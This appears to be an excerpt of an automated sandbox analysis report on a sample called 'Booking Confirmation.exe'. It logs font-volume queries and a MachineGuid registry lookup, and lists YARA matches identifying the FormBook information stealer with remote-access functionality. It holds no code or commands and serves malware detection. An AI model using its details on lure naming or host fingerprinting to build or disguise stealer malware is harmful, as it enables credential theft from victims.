Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation			Jump to behavior

Queries the cryptographic machine GUID

Source: C:\Users\user\Desktop\Booking Confirmation.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 00000005.00000002.709997867.0000000001500000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.912607132.0000000004920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.671285373.0000000003599000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.912770256.0000000004A80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.709963590.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.Booking Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Booking Confirmation.exe.36e45e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Booking Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Booking Confirmation.exe.3739600.2.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 00000005.00000002.709997867.0000000001500000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.912607132.0000000004920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.671285373.0000000003599000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.912770256.0000000004A80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.709963590.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.Booking Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Booking Confirmation.exe.36e45e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Booking Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Booking Confirmation.exe.3739600.2.raw.unpack, type: UNPACKEDPE